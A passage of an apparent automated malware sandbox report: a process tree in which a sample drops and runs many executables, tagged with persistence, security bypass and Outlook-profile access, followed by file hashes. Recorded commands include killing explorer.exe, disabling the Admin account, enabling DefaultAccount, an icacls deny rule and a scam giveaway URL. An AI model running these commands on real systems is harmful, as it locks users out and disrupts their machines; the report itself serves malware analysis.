                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:6472
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\jaffa.exe
                                                                                                                                                                  jaffa.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:6396
                                                                                                                                                                  • C:\Windows\SysWOW64\wfajqstsdo.exe
                                                                                                                                                                    wfajqstsdo.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies visibility of file extensions in Explorer
                                                                                                                                                                    • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                    • Windows security bypass
                                                                                                                                                                    • Disables RegEdit via registry modification
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Windows security modification
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:5468
                                                                                                                                                                    • C:\Windows\SysWOW64\nfysmdar.exe
                                                                                                                                                                      C:\Windows\system32\nfysmdar.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3640
                                                                                                                                                                  • C:\Windows\SysWOW64\fnfxsvwjzdzslle.exe
                                                                                                                                                                    fnfxsvwjzdzslle.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:6580
                                                                                                                                                                  • C:\Windows\SysWOW64\nfysmdar.exe
                                                                                                                                                                    nfysmdar.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5916
                                                                                                                                                                  • C:\Windows\SysWOW64\lhukzutjszgkc.exe
                                                                                                                                                                    lhukzutjszgkc.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:1192
                                                                                                                                                                  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:1732
                                                                                                                                                                    • C:\Windows\splwow64.exe
                                                                                                                                                                      C:\Windows\splwow64.exe 12288
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5220
                                                                                                                                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
                                                                                                                                                                        "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3068
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Process spawned suspicious child process
                                                                                                                                                                        PID:1280
                                                                                                                                                                        • C:\Windows\system32\dwwin.exe
                                                                                                                                                                          C:\Windows\system32\dwwin.exe -x -s 3068
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:6504
                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\helper.vbs"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:5296
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\web3.htm
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6152
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1072
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\jkka.exe
                                                                                                                                                                        jkka.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:6588
                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                          "C:\Windows\system32\notepad.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          • NTFS ADS
                                                                                                                                                                          PID:6872
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:5924
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              • outlook_office_path
                                                                                                                                                                              • outlook_win_path
                                                                                                                                                                              PID:7048
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 7048 240793343
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:6908
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im fontdrvhost.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:6584
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe
                                                                                                                                                                        selfaware.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:6760
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe
                                                                                                                                                                          selfaware.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          PID:6160
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\d830eb0f-48d5-4614-afdf-f5da8db0059a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:984
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:7164
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:7152
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im explorer.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:6176
                                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                        net user Admin /active:no
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5816
                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                            C:\Windows\system32\net1 user Admin /active:no
                                                                                                                                                                            4⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:6312
                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                          net user DefaultAccount /active:yes
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6168
                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                              C:\Windows\system32\net1 user DefaultAccount /active:yes
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:6208
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mrbeast-giftcards-gaway.netlify.app/
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6140
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffda2423cb8,0x7ffda2423cc8,0x7ffda2423cd8
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:4168
                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                xcopy C:\Windows\Fonts C:\Users\Admin\Desktop
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                PID:992
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\73cbc365-eb55-4546-bd03-0fbdadb0d125\packer.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\73cbc365-eb55-4546-bd03-0fbdadb0d125\packer.exe" "C:\Users\Admin\AppData\Local\Temp\73cbc365-eb55-4546-bd03-0fbdadb0d125\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_4cebddec-542d-48db-9724-bef8759fd899" "" True True False 0 -repack
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5540
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1336
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:5488
                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:952
                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4528
                                                                                                                                                                              • C:\Windows\system32\efsui.exe
                                                                                                                                                                                efsui.exe /efs /keybackup
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:2452
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4660 -ip 4660
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4448
                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:2704
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:5316
                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{46f7d7c8-bf64-d741-bc83-59fe224dacfc}\droidcamvideo.inf" "9" "41e7d49db" "0000000000000158" "WinSta0\Default" "000000000000014C" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:5444
                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                    DrvInst.exe "2" "231" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "0000000000000168" "1e57"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:5200
                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{9f884e4f-be9f-0544-a4d1-2a320727eb80}\droidcam.inf" "9" "4e67c8bbf" "0000000000000168" "WinSta0\Default" "000000000000018C" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:3404
                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                    DrvInst.exe "2" "231" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "0000000000000168" "1e57"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    PID:5584
                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:5168
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k CameraMonitor
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5364
                                                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:5768
                                                                                                                                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                    C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004E8
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5416
                                                                                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:6056
                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2728
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5460
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5228
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 5540 -ip 5540
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4544
                                                                                                                                                                                            • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                              werfault.exe /h /shared Global\5b919aa470994e2a801e4de5b341d6ad /t 4256 /p 5772
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6960

                                                                                                                                                                                              Network

                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                              Downloads

                                                                                                                                                                                              • C:\Program Files (x86)\DroidCam\DroidCamApp.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                942KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                f8c12fc1b20887fdb70c7f02f0d7bfb3

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                28d18fd281e17c919f81eda3a2f0d8765f57049f

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f

                                                                                                                                                                                              • C:\Program Files (x86)\DroidCam\Uninstall.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                87KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                de2a97a1e50afa4fec443a8930606ddf

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                4133434c37472ab14443704dd9ad8e8546f3098f

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                5cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49

                                                                                                                                                                                              • C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                6bb0ab3bcd076a01605f291b23ac11ba

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                c486e244a5458cb759b35c12b342a33230b19cdf

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                152B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                1fc959921446fa3ab5813f75ca4d0235

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                0aeef3ba7ba2aa1f725fca09432d384b06995e2a

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                152B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                e9a2c784e6d797d91d4b8612e14d51bd

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                25e2b07c396ee82e4404af09424f747fc05f04c2

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                192B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                d122bdcec2020edfcf15680caaa0e4ee

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                3a5b1cb817c8cf5c2aa27294a56c11c9b3bce16d

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                12df6402d2c5e8354d00272375c27335a80b18420e16c9643d72919f18e69300

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                faec0de74a4cd3c4149d33975ed82a1136ac3a80798e431c64d97af7a549f3e2e4d828be03ce4398d0d8791e7bf4f4e5918ced976445c096eb59a2038e59ffe9

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                264B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                07fe3e6e84cf12b00a3b24428c983fd7

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                382543fbde1eafc15839ec74f4ee1057aceadafa

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                9da9dc6815d6d34fc4c25d661ac205d109a8eafd70158038e535501275f088b0

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                0540c5e060293a11eab85e80cd77943a48485b2936a854c10cf37f1e7a91de12a643b90ebd473c2a2f1b736ffcfa6326202c6a96f02e330eb428183753531075

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                27d59836ef119821ab79dd0bcef83ecc

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                c3ed3dd1e78528fcac191b84869f456227f14971

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                088c7cff8fa71951fb0485eb2b772c62a846d48b63f434046337b119c98077c1

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                552d04eb99520aa6f81e27d39dd6d76f49324b7f7c6023010b3bbb097fe64ce9dd31514e33e4492ec426d3b68495baf98e5adfb797e684be1ec4b5cf8c95e5cd

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                111B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                807419ca9a4734feaf8d8563a003b048

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                a723c7d60a65886ffa068711f1e900ccc85922a6

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                278B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                fd3a332af8e25d9fd47aadfc8aaa0900

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                43047a5c3e48e19d59740897b2a8801e62b3d8ab

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                d3e0ed714f2f14f7f8a8ce2b1b195a727443d59eb92db38f4b3080171b5630c7

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                9ce7ac148c8af4f89758caae6eb5061bf46360a3c53048c82ecc85fe66614fc5d9e32dbcdd809f1f40f99cb0007aac2f9cba495bb626675e6f36ff6722e8da99

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                278B

                                                                                                                                                                                                MD5

                                                                                                                                                                                                7efaa394873035b1f7fa8ee5074ab7f2

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                524516110dd92c55a3bfe80fbefa64585b1aa6a9

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                a4e3af2db79270ae9697ce663b14300717b0d87192e93f153a529bcfd5ddac3c

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                75c142fa2bc10a13f621feacaf5375adbdea486208c50d71272c2a254b1de4adccdca10cf8d89e7f2cb38a01689e93a99e5f79e35824e6b7b543043b4047c6f8

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                18d442f12bc2a34372ba20b2f75c6817

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                93fa0bc2c79cb6db6e7620bc63be1ea9b76bc6f7

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                6d39680c6a09e7b5d9cc460cbaf4f32fcd8235e4c083b09f7d795c16ba589ab2

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                277285c2d10cfea413c6780c218ccbcc4ac7d3b82954a69ce45fefdd97e765a91873b6d50cd8115651de2f1b3b97086e6b14741ffa3b938c9d5d6a3810431284

